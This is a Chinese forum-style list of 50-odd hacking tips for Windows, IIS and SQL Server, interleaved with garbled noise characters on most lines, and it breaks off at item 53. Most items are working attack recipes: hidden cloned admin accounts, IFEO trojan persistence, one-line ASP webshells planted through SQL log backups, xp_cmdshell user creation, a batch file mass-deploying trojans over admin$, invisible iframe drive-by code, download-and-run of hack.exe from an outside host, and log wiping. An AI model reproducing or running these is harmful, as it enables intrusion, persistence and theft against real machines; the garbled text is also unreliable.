Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
) s3 D+ }3 l6 F7 [' U4 fcacls C:\windows\system32 /G hqw20:R5 N2 ]( U/ `% {! U. x
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入# L6 K" q( t& \/ B( _
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
# R. Z! E- {2 M8 i: y0 N4 p; F9 J( k0 `0 m) c) N6 T! }
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。% j2 o7 G0 |3 Y
7 g! @% f, e+ v' K3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
7 A5 m% p8 A4 b, A( L
; V2 j8 g% w9 O8 T r& ]% { T4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号4 j2 T! I5 B: q' S3 F
. Y$ {$ l8 G6 t! N* }6 Y4 c7 h
5、利用INF文件来修改注册表
) g! h6 y# r+ R9 @[Version]
3 w& p- F" c: a% U7 V6 b _1 NSignature="$CHICAGO$"; g0 m M/ z5 W# G; ^% Q& [/ x
[Defaultinstall]
% J# ?9 D; l" Z& KaddREG=Ating0 r' s, W3 d0 b4 u3 m, Y3 p) a1 Y
[Ating]
" B& z% Y! i8 \HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"; B( F: i* l; n8 I Q/ V1 u, ?
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:9 j* X, U8 v- o$ c1 \6 w
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
4 A7 W4 p( ?' [( j1 x5 d其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
1 A2 y% J! c+ S/ f1 c* W- YHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
" W3 z* g; ~1 C6 K8 ]) e3 \HKEY_CURRENT_CONFIG 简写为 HKCC+ A7 _+ _( f! l4 |& o6 ?* A
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值/ l' p: k1 r+ i1 u1 I, O7 p
"1"这里代表是写入或删除注册表键值中的具体数据
; i3 B2 L- {$ V5 S, x V9 A
5 H& @1 W/ Z J; i; k6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,4 J# ?% M& a8 U Q: D/ j: I
多了一步就是在防火墙里添加个端口,然后导出其键值; _3 d% Q+ a* y3 P4 |( f6 w- i
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
2 l1 _4 B7 f3 m' A. Q: V! K) k3 d7 q+ |8 P" k; }4 f3 X' C: Q9 p( O
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
I4 I$ F6 I0 d6 T6 C% Q1 [+ Z在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
; r2 L9 V8 H& a2 ]2 L
- E: L, v7 J0 e$ D! \. Z- l- q1 s1 r8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。$ B$ B. B0 k9 z: f; v, b3 J
o$ O, i. D! ^% N% y; s9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,; K! o! R4 \) W$ [
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
" ~. N0 M4 f& T2 h7 N( |) L& r9 P! o* V) U u/ L- `5 W
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
- Y4 a9 R0 M. G0 c, [2 o6 a$ r0 F( X: C
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
/ ?" e9 i9 C* i7 h3 ?+ [3 R6 T* o l用法:xsniff –pass –hide –log pass.txt5 ?! [, _) x. l* {1 _4 p
- {( E) w) X% J! m) J+ j
12、google搜索的艺术
& k4 u9 }" b& C' \搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”5 b. ^- n E/ c/ S- z' e) T }
或“字符串的语法错误”可以找到很多sql注入漏洞。
& ~, V( C' B+ l( }, @ j1 ?, i
' c; S* C- h8 a% e/ s4 v13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
. B2 @& v0 [" Q6 N( \0 D- h, z) k$ s% Q# {7 t
14、cmd中输入 nc –vv –l –p 1987
" K! P( n6 k: z! @7 l. D# K- I做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃" l8 ?+ x4 {9 E$ b$ j/ R
' Y5 X' h7 r9 _; T4 W S) z
15、制作T++木马,先写个ating.hta文件,内容为
4 o7 x' S! h; ~8 H; c4 M<script language="VBScript">, W+ L6 \8 ^. E/ ^
set wshshell=createobject ("wscript.shell" )
( m: ?: j; K* ?a=wshshell.run("你马的名称",1)
; H! H! c5 T2 `- o) B2 u+ |window.close
/ {" W( u6 D! H* x6 _7 g</script>% j9 o$ R( B1 S
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
2 x8 \7 P6 Y" A7 ~/ R/ w3 N
* \3 m1 C8 K5 a7 E16、搜索栏里输入. A u+ W" w4 @. E
关键字%'and 1=1 and '%'='# j( Z2 H3 p9 w
关键字%'and 1=2 and '%'='
7 L7 d, \8 I- r# G8 a/ ^1 I比较不同处 可以作为注入的特征字符8 x+ I1 S0 e7 O0 [ d% _
. a4 }) M9 e5 x5 \ C/ K17、挂马代码<html>8 V5 @* f+ y- u
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
" |% p7 }0 W! v, n3 d</html>4 m' B2 w0 t" e
" E6 n2 o* J( G18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,1 z0 e- {. X# S! ^5 R( {% h
net localgroup administrators还是可以看出Guest是管理员来。- }! w7 o! P# p$ `0 @0 ^; [( D9 [
4 k) J' h+ k( g8 ]7 ?7 Z19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
( f, Q0 k& I/ ~* W用法: 安装: instsrv.exe 服务名称 路径5 k& v0 m' e9 G6 a/ C
卸载: instsrv.exe 服务名称 REMOVE" l- `8 u9 V- n
[2 h- K+ T4 @; \7 p4 L2 }' s2 j) a3 d* r0 {2 ^
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉9 L7 b# [) `( ^
不能注入时要第一时间想到%5c暴库。: Q# W' Y0 c% A* E/ J" ^8 f
6 W+ T$ a6 o3 M- U4 k0 q22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~' ~2 M; K$ i Q0 D+ i. t- |
1 ]1 e! d5 f9 k/ N
23、缺少xp_cmdshell时
3 O0 f, h- ?3 Y2 j! a7 X: Q尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
$ p- z& |# q* H* m4 u( v假如恢复不成功,可以尝试直接加用户(针对开3389的)& M- x. K1 z" H2 I. E* z
declare @o int% q0 \; W7 `8 v$ x3 N
exec sp_oacreate 'wscript.shell',@o out" k/ S, A( R3 b U. @, A `# s
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员% H5 S3 ~4 m1 K
2 }: U1 C# F" [8 c& z
24.批量种植木马.bat- S8 e/ b( n' U! ?- F @% f
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中+ v* ~+ c- \ v; O' t
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
V" n, I* M/ S& I! Z1 C扫描地址.txt里每个主机名一行 用\\开头! s& ?% a# G( p: @
2 Y. r% s8 e& S" d25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
& t; ?4 J2 C% j4 p
* P) R3 y5 x2 j4 i1 q26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.. P1 K" P: _1 ^
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.: W+ g! g2 I' J2 Y- ]
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
1 u. L' Y; m+ K, _$ R
/ U$ O! b( q6 H# x" J/ G5 U27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
5 }1 Z6 L1 P( n9 P# q然后用#clear logg和#clear line vty *删除日志
' x4 z! {+ o5 ?( ~/ e+ J: R9 p: p: {( i; _6 `9 t& g5 t @
28、电脑坏了省去重新安装系统的方法
+ O1 X. j; ^) B' D, H- r% c5 d9 N: V& \纯dos下执行,: C: \; _5 B0 ]! Y+ f, m
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config* r( ~9 p, m+ w4 h
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config) U3 P" ^% ]' p' M2 {
4 N! J: @, F: d8 f. A' [29、解决TCP/IP筛选 在注册表里有三处,分别是:
" i* [7 D c: l/ UHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
T7 M7 y+ o+ P' U% x. \7 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip& L1 X! c& x8 C: @, z# Z
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% d' o5 i0 B$ s, R& N$ C7 I! S u分别用
/ ~0 n7 ]3 A5 o: c* xregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
/ [. @1 D! ^& y0 z" o2 Oregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip& o* Q# r5 j+ j& Z- f# z# y
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" g( ^' u7 Z& G
命令来导出注册表项
* L& w+ D4 {) T, W E( \# L然后把三个文件里的EnableSecurityFilters"=dword:00000001,
- ]- q: h* e, u( S改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
: V3 b/ l( P- Cregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
: i& c" C# X2 I g' [
4 J. i$ T+ U8 f2 B30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
% H5 j. k8 g% T' xSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
3 d. f9 G7 z( `/ W; p9 b" g& _% {9 ` q D$ N m6 z7 D
31、全手工打造开3389工具
( t2 o) l( x. p9 }5 _打开记事本,编辑内容如下:
: n, a" P( H$ P$ w# h0 p! f5 P {echo [Components] > c:\sql& l3 G1 ?1 I' E/ }
echo TSEnable = on >> c:\sql
3 ?2 x; U$ ]/ {sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
1 e9 [' |: |9 T6 ?" q h编辑好后存为BAT文件,上传至肉鸡,执行9 |+ C; r( z: `/ L" p
( {# g, O% P" Q
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
) k* Z; m0 h$ X! |9 y$ b& `( O9 ?# s) q8 _4 r' Q
33、让服务器重启) \. `1 e$ \* _
写个bat死循环:
& W5 g! _ u4 z" w. H@echo off
# i. z/ Q: j8 H% @:loop1
8 d* i" e5 g; ]3 V' G( ycls) r6 h/ h! p1 |8 e8 f) v3 s% G
start cmd.exe& o2 o8 a' ~+ o
goto loop12 e, c P( s* o+ Z7 Z6 C2 O
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
( Z. V6 ]% s$ T" ^4 P8 U' [
/ n3 o- ~ l1 b& ^: h" ?! ]34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
' K; l8 t% e5 j! I) k@echo off1 E2 Q) m- j' e1 D
date /t >c:/3389.txt
, R9 Q+ \' n( I3 n4 {8 ]) ]5 vtime /t >>c:/3389.txt
! T- a# K' d9 J" ^attrib +s +h c:/3389.bat% j3 D$ V1 ~/ C/ \
attrib +s +h c:/3389.txt+ N2 G6 y3 {, L) A- ^
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
0 P; A- a0 m# }- N# p7 ~) b: V* V8 _& d并保存为3389.bat
; V% f) N( i7 b) P2 H打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
6 |6 u4 K5 C1 y+ a* s; p) O% V/ Y" P& \/ G) P/ F; }
35、有时候提不了权限的话,试试这个命令,在命令行里输入:; }. g$ z+ l+ ?5 J- w( S
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
M( R/ O/ w- z' N8 r输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。* y8 }1 E" @7 e5 T
* R' a( m# Z$ k9 t
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
) i, z0 I3 I6 hecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
5 ]0 E U( V& D0 Lecho 你的FTP账号 >>c:\1.bat //输入账号
5 Q* g. |8 l6 J* V1 q/ C! [echo 你的FTP密码 >>c:\1.bat //输入密码5 l0 z2 N- I. @
echo bin >>c:\1.bat //登入. s4 r1 r& j. [6 C h
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么- t% o5 [& k, R& \: x# c
echo bye >>c:\1.bat //退出
/ S5 F$ U: }3 J" ] O& d' x然后执行ftp -s:c:\1.bat即可
) g Q( u+ s3 o: x; V2 Y0 k
1 C9 l* y9 ]+ U- J& B1 U8 |37、修改注册表开3389两法
6 m5 B$ C8 u, s0 @7 c/ J(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
8 o& B$ G! }- L- o: Techo Windows Registry Editor Version 5.00 >>3389.reg* J) W j: A5 Y0 l
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg# O' q7 M0 N2 L% J0 i) H1 a3 k
echo "Enabled"="0" >>3389.reg8 q7 m& H, W& A
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows) m, A5 Y4 P q
NT\CurrentVersion\Winlogon] >>3389.reg9 P" O) I* t" R9 ^
echo "ShutdownWithoutLogon"="0" >>3389.reg
0 H; K- ? J2 }5 r5 V- [4 @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
+ T$ D5 X1 t7 l5 D>>3389.reg2 Z8 e5 q. o$ r! A+ \
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
, l/ d' `/ H7 p$ w7 l& E7 Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
1 n- A0 A+ S- h- \* h* }>>3389.reg1 O/ Z/ ^& k- Z" N9 ]' r
echo "TSEnabled"=dword:00000001 >>3389.reg
0 ]8 f1 w) C/ Q, g8 ?4 m+ T3 d' }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
, Y+ Y$ |) \8 p1 j j9 s4 M. [echo "Start"=dword:00000002 >>3389.reg3 [, P7 }3 u% S" M* y, |8 O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
! ?$ e( q2 t8 B2 D- v>>3389.reg
7 Z* I! [& X2 necho "Start"=dword:00000002 >>3389.reg
7 @% w. E n0 r4 Y( Z' uecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg# K: I0 }9 @% s$ z: b7 {
echo "Hotkey"="1" >>3389.reg
5 m# Z: ?; @- [# D) r9 X7 Gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% C1 b: D: d& |& {Server\Wds\rdpwd\Tds\tcp] >>3389.reg% }( z) m: M' d; `
echo "PortNumber"=dword:00000D3D >>3389.reg
+ O, H* B' y$ o- N* ^. ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& r0 d; D& f. ~0 Q5 e% |) A `6 _
Server\WinStations\RDP-Tcp] >>3389.reg
6 Z9 c! @3 v' T4 x3 _/ O; F7 }" cecho "PortNumber"=dword:00000D3D >>3389.reg
4 v* R: ^; g/ S$ ]把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。2 z1 o5 e/ F+ {; t, }+ U' M
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)8 K4 o- b8 Y+ Q( }; q
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效' A* [3 h2 j4 {8 Q, `, l# H
(2)winxp和win2003终端开启
8 L$ d- m# t, a- }用以下ECHO代码写一个REG文件:
; q( J( O9 s* @1 i7 |, `echo Windows Registry Editor Version 5.00>>3389.reg& G0 m4 d5 M& c* I# @, x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' m# J3 P \5 }1 k& }' ~0 ^
Server]>>3389.reg; i0 W: ?: k# g
echo "fDenyTSConnections"=dword:00000000>>3389.reg1 M) p6 A+ a% W- |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 C+ W4 ~9 E6 [3 s' }$ i% |* I+ v6 J
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
# y/ U5 G' b" k4 Xecho "PortNumber"=dword:00000d3d>>3389.reg
4 `0 C/ T6 r! z- R. J/ v: O recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' @) e- ?- W' ]. @4 S/ i0 m* jServer\WinStations\RDP-Tcp]>>3389.reg2 A, z! e" w: Z% A3 v8 y
echo "PortNumber"=dword:00000d3d>>3389.reg8 K7 D5 @7 H% F8 K* ?5 f6 o5 i% L6 B
然后regedit /s 3389.reg del 3389.reg
- |% ]% h: m" ?1 `# \9 u. XXP下不论开终端还是改终端端口都不需重启, `5 I+ _# n5 B: R: `; F" M
4 X" G$ {8 N+ H9 r$ J% G! H38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃* |5 g" I6 o& }- H) R3 ^
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'/ q5 \. C4 B1 P$ Y
3 s; e) L1 O- \- K+ ~39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
b" z/ Q& a9 t+ O6 b. x% V(1)数据库文件名应复杂并要有特殊字符
# Z7 n3 B3 ]9 {(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
# K/ [$ C6 I: b* A" c4 @$ N将conn.asp文档中的# d; `. }$ \8 i& O
DBPath = Server.MapPath("数据库.mdb")3 m* y& F* L c3 v6 Q
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
5 j$ E8 g. P, _9 d
/ a; e s8 o0 o修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置" Y/ o2 q, ]4 j' M- u4 H& c1 b7 y
(3)不放在WEB目录里( N+ k* }; c1 H" |$ g
+ E6 W, w4 B* T. B6 w40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
+ u/ z$ n( {$ v可以写两个bat文件 I# x9 O0 p" ^' b
@echo off) v3 {4 A8 L3 q0 S
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe8 ?8 q9 O" x+ p" y; e
@del c:\winnt\system32\query.exe
( P2 A: _( e# s6 @@del %SYSTEMROOT%\system32\dllcache\query.exe
5 o) h+ n8 J/ I4 z/ H! ^. H@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
, c$ }) L& v" P+ K0 ~7 p" D' v$ R
@echo off
- D% s0 s+ k( a( O1 Y8 A@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe9 E+ O2 I6 N+ D3 f) t+ ^
@del c:\winnt\system32\tsadmin.exe7 [! W- S. V% R: W5 S \
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex7 e( W/ ?7 u2 Z7 h8 D/ ~
8 A z j/ b0 E/ P) h5 r41、映射对方盘符
' j. `6 E5 F6 ~3 ftelnet到他的机器上,# T+ [7 h2 y) L8 q7 e
net share 查看有没有默认共享 如果没有,那么就接着运行
7 H, W U! z# {' u7 y. x, E% N3 anet share c$=c:% Q% Q; m) M- P
net share现在有c$2 g+ U5 r G' Q0 }$ s2 G y
在自己的机器上运行
# Q/ }# \8 P3 W( a* M: E8 ~$ ]5 q+ Anet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
+ G# \( a3 f! y" {: u w, X( P) g4 T% p# E1 S5 Q5 w
42、一些很有用的老知识
7 A6 J2 L7 ~! ] a5 ztype c:\boot.ini ( 查看系统版本 )0 B n$ a0 A/ L2 }
net start (查看已经启动的服务)# S: f. g/ n( M/ s$ @
query user ( 查看当前终端连接 )
1 ~+ f+ \! h) Enet user ( 查看当前用户 )
Y; d3 k h ]0 @) V/ m6 t: k# W5 ^net user 用户 密码/add ( 建立账号 ); s: v! r7 Z8 k8 T- j
net localgroup administrators 用户 /add (提升某用户为管理员). d) Q& r6 \( I6 Q% h: ~
ipconfig -all ( 查看IP什么的 ). G0 _' `+ }/ _# d% Y
netstat -an ( 查看当前网络状态 )* i; U4 r: k7 N
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)0 h0 k5 a; p9 D6 Z7 ~: f
克隆时Administrator对应1F4# E1 |: F! F. C5 W! h- h
guest对应1F51 W* y3 v' X" I! ^* B& M
tsinternetuser对应3E8: `4 L+ _" e' x2 ~ n1 d H3 Q6 f
1 V* }# O! E; a) l8 y43、如果对方没开3389,但是装了Remote Administrator Service
. ^4 i; E- B6 l* y用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接! T% F2 o8 K1 L/ F
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
& }- N2 v0 `9 m; @+ T4 u/ ^6 |2 r先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"7 p# v0 V3 @: ]) }6 n
5 i$ z F, x2 f
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定); p! O8 [2 ^3 t. ~# R
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)7 g0 }: a$ o- {5 t
# G" Y& Z9 @8 h6 B4 p45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
_" N% ~* I. Hecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
' Y' q- k% Z, [; Z- r^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
! L9 N3 }1 n9 j7 X7 q$ {" NCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =' [& t8 b7 [, q; W
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs. D2 X& Z- e- C; z; H
(这是完整的一句话,其中没有换行符)
+ ]' K9 R! z2 C1 o8 f: q1 y# m& {$ v然后下载:0 V) G, b, f# ]' A: z
cscript down.vbs http://www.hack520.org/hack.exe hack.exe" @. ]: [: @+ C) m
) C( P6 }$ U; G; G' L6 H8 c46、一句话木马成功依赖于两个条件:8 o2 _! e9 v- ]# k
1、服务端没有禁止adodb.Stream或FSO组件. `4 @1 h" J' ?, ^
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。0 @! B s) }% d# G0 z
( C+ b" D/ X8 l0 C5 q47、利用DB_OWNER权限进行手工备份一句话木马的代码:
" ^, h1 B' _' v$ R" |; }3 G;alter database utsz set RECOVERY FULL--
2 K+ u3 T# |) I* g;create table cmd (a image)--! S# P: j4 l) `4 _. i+ z- A, g3 _
;backup log utsz to disk = 'D:\cmd' with init--8 n7 A, n( z4 N/ M) v- r* {9 }. k
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
! W9 }' H$ O' q9 v- L/ Z+ A;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
; j% ~+ p9 ^* F注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
$ Q( F7 n1 E0 N8 E) w) G6 p. j1 o% _
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
/ n. t% N; ]) ^
8 l- o' e/ P9 H I9 l$ R用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
n2 _0 E7 K- G" W所有会话用 'all'。! k! k& C% K: r& ^
-s sessionid 列出会话的信息。# ~: V- v. l# `" U
-k sessionid 终止会话。( B8 \: h! k9 c* z$ O& S' Y/ F
-m sessionid 发送消息到会话。
! I: l2 Q6 u5 Y. h/ \! i
7 b1 E2 @1 _" L+ p3 ~config 配置 telnet 服务器参数。
R. Y5 C; o- C; f: e0 d+ D4 H& }. Y! h }5 B9 }+ x! n
common_options 为:. X& x" [3 A9 z9 X6 N
-u user 指定要使用其凭据的用户
% G8 o3 v6 l1 N- \0 ]. X8 G: i! j-p password 用户密码: Y S% v. u9 R1 f O3 [
i$ n& b0 f, l( B! X7 O
config_options 为:
* h7 l/ {" x$ r4 y) t* [% hdom = domain 设定用户的默认域3 ^# Y, M4 {9 i3 H
ctrlakeymap = yes|no 设定 ALT 键的映射
5 Q, }* z Y; d5 h( j, Ltimeout = hh:mm:ss 设定空闲会话超时值. K9 f- H; }8 |3 m
timeoutactive = yes|no 启用空闲会话。
/ r2 X; j7 K, |2 z; @maxfail = attempts 设定断开前失败的登录企图数。
. M" Y5 S1 d1 |: \maxconn = connections 设定最大连接数。
; [( T4 a3 c6 Aport = number 设定 telnet 端口。; j) i/ J" l3 u! e
sec = [+/-]NTLM [+/-]passwd( i& [( a7 s( y6 ^, v% A, r! F
设定身份验证机构1 k6 ] j, W. c' C/ q. w. G) C
fname = file 指定审计文件名。9 N8 Y$ L$ H' f6 w1 E' k
fsize = size 指定审计文件的最大尺寸(MB)。
7 z: y/ b# L3 o! Emode = console|stream 指定操作模式。
$ N a* d- g9 X$ X7 Hauditlocation = eventlog|file|both
M) T& ^" U; @+ k" u+ a% p$ o指定记录地点
, J. o( ?1 O1 Q4 h/ {audit = [+/-]user [+/-]fail [+/-]admin
: ?" ?& Y* K* T3 S: {
: Q- q# w/ B$ |49、例如:在IE上访问:6 \' h" b$ ?/ A0 H6 R6 i7 V
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/9 Z1 B% o0 E% A! f) k9 v! h
hack.txt里面的代码是: \1 U1 B! U& R, D3 b
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">) i- T9 M/ e9 Z e
把这个hack.txt发到你空间就可以了!* L; p8 ^" D$ A- Q: p1 a* h4 c' m
这个可以利用来做网马哦!: i( b( B- |& }1 B* {% r/ i
* o2 n2 q# I% A7 c. s9 V. w1 Z$ g
50、autorun的病毒可以通过手动限制!# y8 h; G. [* o
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!" o1 [$ Y% h' K! E1 \* w& Y! K
2,打开盘符用右键打开!切忌双击盘符~7 v0 l# L }# C0 g
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
, E* b1 |4 {: [1 v2 J6 ]3 \: V' @# U* g0 _: z, C1 @$ s
51、log备份时的一句话木马:9 h+ q9 J2 w7 B+ R- X8 S$ V- E
a).<%%25Execute(request("go"))%%25>* Q) G) @, t, X- {
b).<%Execute(request("go"))%>
# W: B" l' \7 V' S" w' xc).%><%execute request("go")%><%1 V& _3 `, Y3 w! l; _1 ^
d).<script language=VBScript runat=server>execute request("sb")</Script>
K7 [! l- _1 v: C1 ]8 d3 V/ le).<%25Execute(request("l"))%25>5 |2 p+ a& O8 a2 f
f).<%if request("cmd")<>"" then execute request("pass")%>
+ H0 D3 v; ?3 T2 W# w* C& j
% G* P% Z/ i1 j n: U52、at "12:17" /interactive cmd
0 [9 R: g, |9 O) T& d* G执行后可以用AT命令查看新加的任务7 d8 S- m- a) m& _
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。) `5 N" i! G! e
5 {: `: Y3 o4 `- r# K0 y0 l3 L3 N; o53、隐藏ASP后门的两种方法
